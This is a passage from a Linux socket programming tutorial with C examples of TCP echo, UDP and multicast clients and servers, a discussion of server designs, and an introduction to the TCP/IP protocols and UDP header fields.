    /* When the data has been received, close() */
    /* the socket descriptor. */
    close(sd);
    return 0;
}
Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g udpclient.c -o udpclient

Run the program. Before that, make sure the previous program example (the UDP server) is running.

[bodo@bakawali testsocket]$ ./udpclient
UDP Client - socket() is OK!
UDP Client - Usage ./udpclient <Server hostname or IP>
UDP Client - Using default hostname/IP!
UDP Client - gethostname() of the server is OK...
Connected to UDP server bakawali on port 3333.
UDP Client - sendto() is OK!
Waiting a reply from UDP server...
UDP client received the following: "Hello! A client request message lol!" message
 from port 3333, address 203.106.93.94
[bodo@bakawali testsocket]$

Well, our UDP server and client communicated successfully. The following are the expected messages at the server console.

[bodo@bakawali testsocket]$ ./udpserver
UDP server - socket() is OK
UDP server - try to bind...
UDP server - bind() is OK
Using IP 0.0.0.0 and port 3333
UDP server - Listening...
UDP Server - recvfrom() is OK...
UDP Server received the following:
 "Hello! A client request message lol!" message
from port 32824 and address 203.106.93.94.
UDP Server replying to the stupid UDP client...
UDP Server - sendto() is OK...
[bodo@bakawali testsocket]$

NETWORK PROGRAMMING LINUX SOCKET PART 12: SERVER DESIGN


Connection-oriented server designs

There are a number of ways to design a connection-oriented socket server. Other designs are possible, but the ones described below are the most common.

Note: A worker job or a worker thread refers to a process or sub-process (thread) that does data processing by using the socket descriptor. For example, a worker process accesses a database file to extract and format information for sending to the remote peer through the socket descriptor and its associated connection. It could then receive a response or set of data from the remote peer and update the database accordingly. Depending on the design of the server, the worker usually does not perform the connection "bring-up" or initiation. This is usually done by the listening or server job or thread, which then passes the descriptor to the worker job or thread.

Iterative server

In the iterative server example, a single server job handles all incoming connections and all data flows with the client jobs. When the accept() API completes, the server handles the entire transaction. This is the easiest server to develop, but it does have a few problems. While the server is handling the request from a given client, additional clients could be trying to reach the server. These requests fill the listen() backlog, and some of them will eventually be rejected.

All of the remaining examples are concurrent server designs. In these designs, the system uses multiple jobs and threads to handle the incoming connection requests. With a concurrent server there are usually multiple clients connected to the server at the same time.

spawn() server and spawn() worker

The spawn() server and spawn() worker example uses the spawn() API to create a new job (often called a "child job") to handle each incoming request. (spawn() is not a standard Linux call; on Linux the same role is normally played by fork() or posix_spawn().) After spawn() completes, the server can wait on the accept() API for the next incoming connection. The only problem with this server design is the performance overhead of creating a new job each time a connection is received.

You can avoid the performance overhead of the spawn() server example by using prestarted jobs. Instead of creating a new job each time a connection is received, the incoming connection is given to a job that is already active. If the child job is already active, the server can pass it the descriptor by using the sendmsg() and recvmsg() APIs.

sendmsg() server and recvmsg() worker

Servers that use the sendmsg() and recvmsg() APIs to pass descriptors remain unhindered during heavy activity. They do not need to know which worker job is going to handle each incoming connection. When a server calls sendmsg(), the descriptor for the incoming connection and any control data are put in an internal queue for the AF_UNIX socket. When a worker job becomes available, it calls recvmsg() and receives the first descriptor and the control data that was in the queue.
As an example of how you can use the sendmsg() API to pass a descriptor to a job that does not exist yet, a server can do the following:

1. Use the socketpair() API to create a pair of AF_UNIX sockets.
2. Use the sendmsg() API to send a descriptor over one of the AF_UNIX sockets created by socketpair().
3. Call spawn() to create a child job that inherits the other end of the socket pair.

The child job calls recvmsg() to receive the descriptor that the server passed. The child job was not active when the server called sendmsg().

The sendmsg() and recvmsg() APIs are extremely flexible. You can use these APIs to send data buffers, descriptors, or both.

Multiple accept() servers and multiple accept() workers

In the previous examples, the worker job did not get involved until after the server received the incoming connection request. The multiple accept() servers and multiple accept() workers design turns each of the worker jobs into an iterative server. The server job still calls the socket(), bind(), and listen() APIs. When the listen() call completes, the server creates each of the worker jobs and gives the listening socket to each one of them. All of the worker jobs then call the accept() API. When a client tries to connect to the server, only one accept() call completes, and that worker handles the connection. This type of design removes the need to hand the incoming connection over to a worker job, and saves the performance overhead that is associated with that operation. As a result, this design has the best performance of the designs described here.

Example: Writing an iterative server program

This example shows how you can write an iterative server program. The following figure illustrates how the server and client jobs interact when the system uses the iterative server design.

Figure 1: An example of socket APIs used for iterative server design.

In the following example of the server program, the number of incoming connections that the server allows depends on the first parameter that is passed to the server. The default is for the server to allow only one connection.

/**** iserver.c ****/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset() */
#include <unistd.h>      /* close() */
#include <sys/socket.h>
#include <netinet/in.h>

#define SERVER_PORT 12345

/* Run with a number of incoming connection as argument */
int main(int argc, char *argv[])
{
    int i, len, num, rc;
    int listen_sd, accept_sd;
    /* Buffer for data */
    char buffer[100];
    struct sockaddr_in addr;

    /* If an argument was specified, use it to */
    /* control the number of incoming connections */
    if(argc >= 2)
        num = atoi(argv[1]);
    /* Prompt some message */
    else
    {
        printf("Usage: %s <The_number_of_client_connection else 1 will be used>\n", argv[0]);
        num = 1;
    }

    /* Create an AF_INET stream socket to receive */
    /* incoming connections on */
    listen_sd = socket(AF_INET, SOCK_STREAM, 0);
    if(listen_sd < 0)
    {
        perror("Iserver - socket() error");
        exit(-1);
    }
    else
        printf("Iserver - socket() is OK\n");

    printf("Binding the socket...\n");
    /* Bind the socket */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(SERVER_PORT);
    rc = bind(listen_sd, (struct sockaddr *)&addr, sizeof(addr));
    if(rc < 0)
    {
        perror("Iserver - bind() error");
        close(listen_sd);
        exit(-1);
    }
    else
        printf("Iserver - bind() is OK\n");

    /* Set the listen backlog */
    rc = listen(listen_sd, 5);
    if(rc < 0)
    {
        perror("Iserver - listen() error");
        close(listen_sd);
        exit(-1);
    }
    else
        printf("Iserver - listen() is OK\n");

    /* Inform the user that the server is ready */
    printf("The Iserver is ready!\n");

    /* Go through the loop once for each connection */
    for(i=0; i < num; i++)
    {
        /* Wait for an incoming connection */
        printf("Iteration: #%d\n", i+1);
        printf(" waiting on accept()\n");
        accept_sd = accept(listen_sd, NULL, NULL);
        if(accept_sd < 0)
        {
            perror("Iserver - accept() error");
            close(listen_sd);
            exit(-1);
        }
        else
            printf("accept() is OK and completed successfully!\n");

        /* Receive a message from the client. One byte of the */
        /* buffer is kept free for the string terminator. */
        printf("I am waiting client(s) to send message(s) to me...\n");
        rc = recv(accept_sd, buffer, sizeof(buffer) - 1, 0);
        if(rc <= 0)
        {
            perror("Iserver - recv() error");
            close(listen_sd);
            close(accept_sd);
            exit(-1);
        }
        else
        {
            /* Terminate the data before printing it as a string */
            buffer[rc] = '\0';
            printf("The message from client: \"%s\"\n", buffer);
        }

        /* Echo the data back to the client */
        printf("Echoing it back to client...\n");
        len = rc;
        rc = send(accept_sd, buffer, len, 0);
        if(rc <= 0)
        {
            perror("Iserver - send() error");
            close(listen_sd);
            close(accept_sd);
            exit(-1);
        }
        else
            printf("Iserver - send() is OK.\n");

        /* Close the incoming connection */
        close(accept_sd);
    }

    /* Close the listen socket */
    close(listen_sd);
    return 0;
}
Compile and link.

[bodo@bakawali testsocket]$ gcc -g iserver.c -o iserver

Run the server program.

[bodo@bakawali testsocket]$ ./iserver
Usage: ./iserver <The_number_of_client_connection else 1 will be used>
Iserver - socket() is OK
Binding the socket...
Iserver - bind() is OK
Iserver - listen() is OK
The Iserver is ready!
Iteration: #1
 waiting on accept()

The server is now waiting for connections from clients. The following program example is a client program.

Example: Connection-oriented common client

This example provides the code for the client job. The client job does a socket(), connect(), send(), recv(), and close(). The client job is not aware that the data buffer it sent and received is going to a worker job rather than to the server. This client program can also be used with the previous connection-oriented server program examples.

/****** comclient.c ******/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset(), strlen(), strcspn() */
#include <unistd.h>      /* close() */
#include <netdb.h>       /* getaddrinfo() */
#include <sys/socket.h>
#include <netinet/in.h>

/* Our server port as in the previous program */
#define SERVER_PORT 12345

int main(int argc, char *argv[])
{
    int len, rc;
    int sockfd;
    char send_buf[100];
    char recv_buf[100];
    struct sockaddr_in addr;
    struct addrinfo hints, *res;

    if(argc != 2)
    {
        printf("Usage: %s <Server_name or Server_IP_address>\n", argv[0]);
        exit(-1);
    }

    /* Create an AF_INET stream socket */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if(sockfd < 0)
    {
        perror("client - socket() error");
        exit(-1);
    }
    else
        printf("client - socket() is OK.\n");

    /* Resolve the server name or IP address given on the command line */
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    rc = getaddrinfo(argv[1], NULL, &hints, &res);
    if(rc != 0)
    {
        fprintf(stderr, "client - getaddrinfo() error: %s\n", gai_strerror(rc));
        close(sockfd);
        exit(-1);
    }

    /* Initialize the socket address structure */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr = ((struct sockaddr_in *)res->ai_addr)->sin_addr;
    addr.sin_port = htons(SERVER_PORT);
    freeaddrinfo(res);

    /* Connect to the server */
    rc = connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
    if(rc < 0)
    {
        perror("client - connect() error");
        close(sockfd);
        exit(-1);
    }
    else
    {
        printf("client - connect() is OK.\n");
        printf("connect() completed successfully.\n");
        printf("Connection with %s using port %d established!\n", argv[1], SERVER_PORT);
    }

    /* Enter data buffer that is to be sent. fgets() never */
    /* writes more than sizeof(send_buf) bytes. */
    printf("Enter message to be sent to server:\n");
    if(fgets(send_buf, sizeof(send_buf), stdin) == NULL)
    {
        fprintf(stderr, "client - no input to send\n");
        close(sockfd);
        exit(-1);
    }
    /* Strip the trailing newline kept by fgets() */
    send_buf[strcspn(send_buf, "\n")] = '\0';

    /* Send data buffer to the worker job */
    len = send(sockfd, send_buf, strlen(send_buf) + 1, 0);
    if(len != (int)(strlen(send_buf) + 1))
    {
        perror("client - send() error");
        close(sockfd);
        exit(-1);
    }
    else
        printf("client - send() is OK.\n");
    printf("%d bytes sent.\n", len);

    /* Receive data buffer from the worker job */
    len = recv(sockfd, recv_buf, sizeof(recv_buf) - 1, 0);
    if(len <= 0)
    {
        perror("client - recv() error");
        close(sockfd);
        exit(-1);
    }
    else
    {
        /* Terminate the data before printing it as a string */
        recv_buf[len] = '\0';
        printf("client - recv() is OK.\n");
        printf("The sent message: \"%s\" successfully received by server and echoed back to client!\n", recv_buf);
        printf("%d bytes received.\n", len);
    }

    /* Close the socket */
    close(sockfd);
    return 0;
}

Compile and link.

[bodo@bakawali testsocket]$ gcc -g comclient.c -o comclient

Note that the gets() function is dangerous and should not be used, because it cannot limit how much data it reads into the buffer. The listing reads the message with fgets() and an explicit buffer size instead. Run the program, making sure the server program from the previous example is already running.

[bodo@bakawali testsocket]$ ./comclient
Usage: ./comclient <Server_name or Server_IP_address>
[bodo@bakawali testsocket]$ ./comclient bakawali
client - socket() is OK.
client - connect() is OK.
connect() completed successfully.
Connection with bakawali using port 12345 established!
Enter message to be sent to server:
This is a test message from a stupid client lol!
client - send() is OK.
49 bytes sent.
client - recv() is OK.
The sent message: "This is a test message from a stupid client lol!" successfully received by server and echoed back to client!
49 bytes received.
[bodo@bakawali testsocket]$

And the message at the server console.

[bodo@bakawali testsocket]$ ./iserver
Usage: ./iserver <The_number_of_client_connection else 1 will be used>
Iserver - socket() is OK
Binding the socket...
Iserver - bind() is OK
Iserver - listen() is OK
The Iserver is ready!
Iteration: #1
 waiting on accept()
accept() is OK and completed successfully!
I am waiting client(s) to send message(s) to me...
The message from client: "This is a test message from a stupid client lol!"
Echoing it back to client...
Iserver - send() is OK.
[bodo@bakawali testsocket]$

Let's try more than one connection. First, run the server.

[bodo@bakawali testsocket]$ ./iserver 2
Iserver - socket() is OK
Binding the socket...
Iserver - bind() is OK
Iserver - listen() is OK
The Iserver is ready!
Iteration: #1
 waiting on accept()

Then run the client twice.

[bodo@bakawali testsocket]$ ./comclient bakawali
client - socket() is OK.
client - connect() is OK.
connect() completed successfully.
Connection with bakawali using port 12345 established!
Enter message to be sent to server:
Test message #1
client - send() is OK.
16 bytes sent.
client - recv() is OK.
The sent message: "Test message #1" successfully received by server and echoed back to client!
16 bytes received.
[bodo@bakawali testsocket]$ ./comclient bakawali
client - socket() is OK.
client - connect() is OK.
connect() completed successfully.
Connection with bakawali using port 12345 established!
Enter message to be sent to server:
Test message #2
client - send() is OK.
16 bytes sent.
client - recv() is OK.
The sent message: "Test message #2" successfully received by server and echoed back to client!
16 bytes received.
[bodo@bakawali testsocket]$

The message on the server console.

[bodo@bakawali testsocket]$ ./iserver 2
Iserver - socket() is OK
Binding the socket...
Iserver - bind() is OK
Iserver - listen() is OK
The Iserver is ready!
Iteration: #1
 waiting on accept()
accept() is OK and completed successfully!
I am waiting client(s) to send message(s) to me...
The message from client: "Test message #1"
Echoing it back to client...
Iserver - send() is OK.
Iteration: #2
 waiting on accept()
accept() is OK and completed successfully!
I am waiting client(s) to send message(s) to me...
The message from client: "Test message #2"
Echoing it back to client...
Iserver - send() is OK.
[bodo@bakawali testsocket]$
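Both programs call send() and recv() once and assume the whole message moved in one call. That holds for these tiny test messages, but a stream socket is allowed to transfer fewer bytes than requested. The following is a minimal sketch of the usual loop around send() and recv(). The helper names send_all() and recv_all() are made up for illustration and are not part of the socket API.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Hypothetical helper: call send() until all len bytes are written. */
/* Returns 0 on success, -1 on error.                                 */
int send_all(int sd, const void *buf, size_t len)
{
    const char *p = buf;

    while (len > 0) {
        ssize_t n = send(sd, p, len, 0);
        if (n < 0) {
            if (errno == EINTR)
                continue;             /* interrupted by a signal, try again */
            return -1;
        }
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Hypothetical helper: call recv() until len bytes have arrived or */
/* the peer closes. Returns the number of bytes read, -1 on error.  */
ssize_t recv_all(int sd, void *buf, size_t len)
{
    char *p = buf;
    size_t got = 0;

    while (got < len) {
        ssize_t n = recv(sd, p + got, len - got, 0);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (n == 0)
            break;                    /* peer closed the connection */
        got += (size_t)n;
    }
    return (ssize_t)got;
}
```

Note that recv_all() only helps when the receiver knows how many bytes to expect, for example because the sender transmits a length first.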

NETWORK PROGRAMMING LINUX SOCKET PART 13: MULTICAST


The working program examples, if any, were compiled using gcc, tested using public IPs, and run on Linux Fedora 3 (updated several times) as a normal user. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration. All the program examples are generic. Beware of code lines that wrap onto more than one line.

Example: Sending and receiving a multicast datagram

IP multicasting provides the capability for an application to send a single IP datagram that a group of hosts in a network can receive. The hosts that are in the group may reside on a single subnet or may be on different subnets that have been connected by multicast-capable routers. Hosts may join and leave groups at any time. There are no restrictions on the location or number of members in a host group. A class D Internet address in the range 224.0.0.1 to 239.255.255.255 identifies a host group.

An application program can send or receive multicast datagrams by using the socket() API and connectionless SOCK_DGRAM type sockets. Each multicast transmission is sent from a single network interface, even if the host has more than one multicasting-capable interface. It is a one-to-many transmission method. You cannot use connection-oriented sockets of type SOCK_STREAM for multicasting.

When a socket of type SOCK_DGRAM is created, an application can use the setsockopt() function to control the multicast characteristics associated with that socket. The setsockopt() function accepts the following IPPROTO_IP level flags:

1. IP_ADD_MEMBERSHIP: Joins the multicast group specified.
2. IP_DROP_MEMBERSHIP: Leaves the multicast group specified.
3. IP_MULTICAST_IF: Sets the interface over which outgoing multicast datagrams are sent.
4. IP_MULTICAST_TTL: Sets the Time To Live (TTL) in the IP header for outgoing multicast datagrams. By default it is set to 1. Datagrams with a TTL of 0 are not transmitted on any sub-network. Multicast datagrams with a TTL greater than 1 may be delivered to more than one sub-network, if there are one or more multicast routers attached to the first sub-network.
5. IP_MULTICAST_LOOP: Specifies whether or not a copy of an outgoing multicast datagram is delivered to the sending host as long as it is a member of the multicast group.

The following examples enable a socket to send and receive multicast datagrams. The steps needed to send a multicast datagram differ from the steps needed to receive a multicast datagram.

Example: Sending a multicast datagram, a server program

The following example enables a socket to perform the steps listed below and to send multicast datagrams:

1. Create an AF_INET, SOCK_DGRAM type socket.

2. Initialize a sockaddr_in structure with the destination group IP address and port number.
3. Set the IP_MULTICAST_LOOP socket option according to whether the sending system should receive a copy of the multicast datagrams that are transmitted.
4. Set the IP_MULTICAST_IF socket option to define the local interface over which you want to send the multicast datagrams.
5. Send the datagram.

[bodo@bakawali testsocket]$ cat mcastserver.c
/* Send Multicast Datagram code example. */
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset() */
#include <unistd.h>      /* close(), read() */

struct in_addr localInterface;
struct sockaddr_in groupSock;
int sd;
char databuf[1024] = "Multicast test message lol!";
int datalen = sizeof(databuf);

int main (int argc, char *argv[ ])
{
    /* Create a datagram socket on which to send. */
    sd = socket(AF_INET, SOCK_DGRAM, 0);
    if(sd < 0)
    {
        perror("Opening datagram socket error");
        exit(1);
    }
    else
        printf("Opening the datagram socket...OK.\n");

    /* Initialize the group sockaddr structure with a */
    /* group address of 226.1.1.1 and port 4321. */
    memset((char *) &groupSock, 0, sizeof(groupSock));
    groupSock.sin_family = AF_INET;
    groupSock.sin_addr.s_addr = inet_addr("226.1.1.1");
    groupSock.sin_port = htons(4321);

    /* Disable loopback so you do not receive your own datagrams.
    {
        char loopch = 0;
        if(setsockopt(sd, IPPROTO_IP, IP_MULTICAST_LOOP, (char *)&loopch, sizeof(loopch)) < 0)
        {
            perror("Setting IP_MULTICAST_LOOP error");
            close(sd);
            exit(1);
        }
        else
            printf("Disabling the loopback...OK.\n");
    }
    */

    /* Set local interface for outbound multicast datagrams. */
    /* The IP address specified must be associated with a local, */
    /* multicast capable interface. */
    localInterface.s_addr = inet_addr("203.106.93.94");
    if(setsockopt(sd, IPPROTO_IP, IP_MULTICAST_IF, (char *)&localInterface, sizeof(localInterface)) < 0)
    {
        perror("Setting local interface error");
        close(sd);
        exit(1);
    }
    else
        printf("Setting the local interface...OK\n");

    /* Send a message to the multicast group specified by the */
    /* groupSock sockaddr structure. */
    /*int datalen = 1024;*/
    if(sendto(sd, databuf, datalen, 0, (struct sockaddr*)&groupSock, sizeof(groupSock)) < 0)
    {
        perror("Sending datagram message error");
    }
    else
        printf("Sending datagram message...OK\n");

    /* Try the re-read from the socket if the loopback is not disabled
    if(read(sd, databuf, datalen) < 0)
    {
        perror("Reading datagram message error\n");
        close(sd);
        exit(1);
    }
    else
    {
        printf("Reading datagram message from client...OK\n");
        printf("The message is: %s\n", databuf);
    }
    */

    close(sd);
    return 0;
}

Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g mcastserver.c -o mcastserver

Before running this multicaster program, you have to run the client program first, as shown in the following section.

Example: Receiving a multicast datagram, a client

The following example enables a socket to perform the steps listed below and to receive multicast datagrams:

1. Create an AF_INET, SOCK_DGRAM type socket.
2. Set the SO_REUSEADDR option to allow multiple applications to receive datagrams that are destined to the same local port number.
3. Use the bind() function to specify the local port number. Specify the IP address as INADDR_ANY in order to receive datagrams that are addressed to a multicast group.
4. Use the IP_ADD_MEMBERSHIP socket option to join the multicast group that receives the datagrams. When joining a group, specify the class D group address along with the IP address of a local interface. The IP_ADD_MEMBERSHIP socket option must be set once for each local interface that is to receive the multicast datagrams.
5. Receive the datagram.

/* Receiver/client multicast Datagram example. */
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset() */
#include <unistd.h>      /* close(), read() */

struct sockaddr_in localSock;
struct ip_mreq group;
int sd;
int datalen;
char databuf[1024];

int main(int argc, char *argv[])
{
    /* Create a datagram socket on which to receive. */
    sd = socket(AF_INET, SOCK_DGRAM, 0);
    if(sd < 0)
    {
        perror("Opening datagram socket error");
        exit(1);
    }
    else
        printf("Opening datagram socket....OK.\n");

    /* Enable SO_REUSEADDR to allow multiple instances of this */
    /* application to receive copies of the multicast datagrams. */
    {
        int reuse = 1;
        if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&reuse, sizeof(reuse)) < 0)
        {
            perror("Setting SO_REUSEADDR error");
            close(sd);
            exit(1);
        }
        else
            printf("Setting SO_REUSEADDR...OK.\n");
    }

    /* Bind to the proper port number with the IP address */
    /* specified as INADDR_ANY. */
    memset((char *) &localSock, 0, sizeof(localSock));
    localSock.sin_family = AF_INET;
    localSock.sin_port = htons(4321);
    localSock.sin_addr.s_addr = htonl(INADDR_ANY);
    if(bind(sd, (struct sockaddr*)&localSock, sizeof(localSock)))
    {
        perror("Binding datagram socket error");
        close(sd);
        exit(1);
    }
    else
        printf("Binding datagram socket...OK.\n");

    /* Join the multicast group 226.1.1.1 on the local 203.106.93.94 */
    /* interface. Note that this IP_ADD_MEMBERSHIP option must be */
    /* called for each local interface over which the multicast */
    /* datagrams are to be received. */
    group.imr_multiaddr.s_addr = inet_addr("226.1.1.1");
    group.imr_interface.s_addr = inet_addr("203.106.93.94");
    if(setsockopt(sd, IPPROTO_IP, IP_ADD_MEMBERSHIP, (char *)&group, sizeof(group)) < 0)
    {
        perror("Adding multicast group error");
        close(sd);
        exit(1);
    }
    else
        printf("Adding multicast group...OK.\n");

    /* Read from the socket. The last byte of the zero-filled */
    /* buffer is left untouched so the data stays terminated. */
    datalen = sizeof(databuf) - 1;
    if(read(sd, databuf, datalen) < 0)
    {
        perror("Reading datagram message error");
        close(sd);
        exit(1);
    }
    else
    {
        printf("Reading datagram message...OK.\n");
        printf("The message from multicast server is: \"%s\"\n", databuf);
    }

    close(sd);
    return 0;
}

Compile and link.

[bodo@bakawali testsocket]$ gcc -g mcastclient.c -o mcastclient

Run the client program.

[bodo@bakawali testsocket]$ ./mcastclient
Opening datagram socket....OK.
Setting SO_REUSEADDR...OK.
Binding datagram socket...OK.
Adding multicast group...OK.

Then run the server program.

[bodo@bakawali testsocket]$ ./mcastserver
Opening the datagram socket...OK.
Setting the local interface...OK
Sending datagram message...OK
[bodo@bakawali testsocket]$

The messages on the client console are shown below.

[bodo@bakawali testsocket]$ ./mcastclient
Opening datagram socket....OK.
Setting SO_REUSEADDR...OK.
Binding datagram socket...OK.
Adding multicast group...OK.
Reading datagram message...OK.
The message from multicast server is: "Multicast test message lol!"
[bodo@bakawali testsocket]$
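The sender in this example leaves IP_MULTICAST_TTL at its default of 1, so its datagrams stay on the local sub-network. The following is a minimal sketch of how a sender might raise the TTL so that multicast routers can forward the datagrams, and read the value back. The helper names set_mcast_ttl() and get_mcast_ttl() are made up for illustration, and the behaviour shown is what is expected on Linux.

```c
#include <assert.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: set the TTL used for outgoing multicast */
/* datagrams on the UDP socket sd. Returns 0 on success, -1 on error. */
int set_mcast_ttl(int sd, unsigned char ttl)
{
    return setsockopt(sd, IPPROTO_IP, IP_MULTICAST_TTL, &ttl, sizeof(ttl));
}

/* Hypothetical helper: read the current multicast TTL of sd. */
/* Returns the TTL, or -1 on error.                            */
int get_mcast_ttl(int sd)
{
    int ttl = 0;
    socklen_t len = sizeof(ttl);

    if (getsockopt(sd, IPPROTO_IP, IP_MULTICAST_TTL, &ttl, &len) < 0)
        return -1;
    return ttl;
}
```

For example, calling set_mcast_ttl(sd, 8) before sendto() would let a datagram cross up to seven multicast routers, provided the routers are configured to forward the group.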

LINUX SOCKET PART 15 Advanced TCP/IP - The TCP/IP Protocols & RAW Socket
This is a continuation from the Part III series, TCP & UDP Client-server program examples. The working program examples, if any, were compiled using gcc, tested using public IPs, and run on Linux / Fedora Core 3 (updated several times) as root or SUID 0. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration. This Module concentrates on the TCP/IP stack and tries to dig deeper, down to the packet level.

Abilities that should be acquired for this session:

Able to understand the 7-layer OSI stack.
Able to understand the 4-layer TCP/IP stack/suite.
Able to understand the protocols in the TCP/IP stack.
Able to find and appreciate the RFCs and Standards.
Able to understand and use the RAW socket (vs cooked socket).
Able to understand, and use for good purposes, the useful network tools that can be developed using the RAW socket.

(Host-to-Host) Transport Layer

The Transport layer has two major jobs:

1. It must subdivide user-sized data buffers into network layer sized datagrams, and
2. It must enforce any desired transmission control such as reliable delivery.

The Transport layer is responsible for end-to-end data integrity. The two most important protocols in this layer are Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). TCP provides reliable data delivery service with end-to-end error detection and correction and also enables hosts to maintain multiple, simultaneous connections. UDP provides low-overhead, connectionless datagram delivery service. Both protocols deliver data between the Application layer and the Internet layer. Application programmers can choose whichever service is more appropriate for their specific applications.

Protocols defined at this layer accept data from application protocols running at the Application layer, encapsulate it in the protocol header, and deliver the data segment thus formed to the lower IP layer for routing. Unlike the IP protocol, the transport layer is aware of the identity of the ultimate user representative process. As such, the Transport layer, in the TCP/IP suite, embodies what data communications are all about: the delivery of information from an application on one computer to an application on another computer.

User Datagram Protocol (UDP, RFC 768)

UDP gives application programs direct access to a datagram delivery service, like the delivery service that IP provides. This allows applications to exchange messages over the network with a minimum of protocol overhead. UDP is an unreliable (it doesn't care about the quality of the deliveries it makes), connectionless (it doesn't establish a connection on behalf of user applications) datagram protocol. Within your computer, UDP will deliver data correctly.

UDP is used as a data transport service when the amount of data being transmitted is small, because the overhead of creating connections and ensuring reliable delivery may be greater than the work of retransmitting the entire data set. Broadcast-oriented services use UDP, as do those in which repeated, out of sequence, or missed requests have no harmful side effects. Since no state is maintained for UDP transmission, it is ideal for repeated, short operations such as the Remote Procedure Call (RPC) protocol.

UDP packets can arrive in any order. If there is a network bottleneck that drops packets, UDP packets may not arrive at all. It's up to the application built on UDP to determine that a packet was lost, and to resend it if necessary. NFS and NIS are built on top of UDP because of its speed and statelessness. While the performance advantages of a fast protocol are obvious, the stateless nature of UDP is equally important. Without state information in either the client or server, crash recovery is greatly simplified.

UDP is also the transport protocol for several well-known application-layer protocols, including Network File System (NFS), Simple Network Management Protocol (SNMP), Domain Name System (DNS), and Trivial File Transfer Protocol (TFTP). The following figure shows the UDP datagram format.

Figure 11: The UDP Datagram Format. A brief description:

Field: Description

Source Port (16 bits): This field is optional and specifies the port number of the application that is originating the user data.
Destination Port (16 bits): This is the port number pertaining to the destination application.
Length (16 bits): This field describes the total length of the UDP datagram, including both data and header information.
Checksum (16 bits): Integrity checking is optional under UDP. If turned on, this field is used by both ends of the communication channel for data integrity checks.

Table 4: UDP fields description.
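To make the four fields in the table concrete, here is a minimal sketch that reads them out of the first 8 bytes of a raw UDP datagram. The struct and function names (udp_fields, parse_udp_header) are made up for illustration. The sketch only assumes that each field is 16 bits wide and stored in network (big-endian) byte order.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical container for the four UDP header fields (host byte order). */
struct udp_fields {
    uint16_t src_port;
    uint16_t dst_port;
    uint16_t length;     /* header plus data, in bytes */
    uint16_t checksum;   /* 0 means "no checksum" over IPv4 */
};

/* Read a 16-bit big-endian value from two bytes. */
static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Hypothetical helper: decode the UDP header at the start of pkt. */
/* Returns 0 on success, -1 if the buffer cannot hold a valid datagram. */
int parse_udp_header(const uint8_t *pkt, size_t len, struct udp_fields *out)
{
    if (len < 8)
        return -1;                    /* a UDP header is always 8 bytes */

    out->src_port = be16(pkt);
    out->dst_port = be16(pkt + 2);
    out->length   = be16(pkt + 4);
    out->checksum = be16(pkt + 6);

    /* The length field counts the header too, so it is at least 8 */
    /* and cannot exceed what was actually captured.               */
    if (out->length < 8 || out->length > len)
        return -1;
    return 0;
}
```

A datagram carrying 4 bytes of data therefore has a length field of 12, that is, 8 bytes of header plus 4 bytes of data.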

Well, let's review what we have covered so far. The following figure is the TCP/IP stack mentioned before. When data is sent from one host to another, it has to go through the layers, depending on the application (protocols). Every layer adds (encapsulates the data in) its own header.

Figure 12: TCP/IP header encapsulation, illustrated vertically.

To make it clearer, the following figure shows the same packet as in the previous figure, rearranged horizontally. The Data... part may also contain the header of an upper protocol, such as the Transport layer header.

Figure 13: TCP/IP header encapsulation, illustrated horizontally. As an example, by assuming there is no other information inserted between the Transport and the Internetwork layers, the following figure shows the packet when the data has gone through the Transport and Internetwork layers.

Figure 14: The UDP and IP headers in a packet.

From the above figure, what IP considers to be the data field is in fact just another piece of formatted information that includes both the UDP header and the user protocol data. To IP it should not matter what the data field is hiding. The details of the header information for each protocol should clearly convey to the reader the purpose of the protocol. Keep in mind that at machine level, all the fields in the packet are actually just a combination of 0s and 1s. Let's continue with another important protocol in the Transport layer, TCP.

Transmission Control Protocol (TCP)

Transmission Control Protocol (TCP) is a required TCP/IP standard defined in RFC 793, "Transmission Control Protocol (TCP)", that provides a reliable, connection-oriented packet delivery service. The Transmission Control Protocol:

1. Guarantees delivery of IP datagrams.
2. Performs segmentation and reassembly of large blocks of data sent by programs.
3. Ensures proper sequencing and ordered delivery of segmented data.
4. Performs checks on the integrity of transmitted data by using checksum calculations.
5. Sends positive acknowledgement messages when data is received successfully. By using selective acknowledgments, negative acknowledgments for data not received are also sent.
6. Offers a preferred method of transport for programs that must use reliable session-based data transmission, such as client/server database and e-mail programs.

It is a fully reliable, connection-oriented, acknowledged, end-to-end byte stream protocol that provides consistent, properly sequenced data delivery across the network. TCP supports data segmentation and reassembly. It also supports multiplexing/demultiplexing using source and destination port numbers in much the same way they are used by UDP. Together with the Internet Protocol (IP), TCP represents the heart of the Internet protocols.
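The checksum calculation mentioned in the list above is the 16-bit one's-complement Internet checksum (described in RFC 1071), which TCP, UDP and IP all use. The following is a minimal sketch over a plain byte buffer. The function name inet_checksum() is made up for illustration, and a real TCP or UDP checksum would also have to include the pseudoheader in the buffer.

```c
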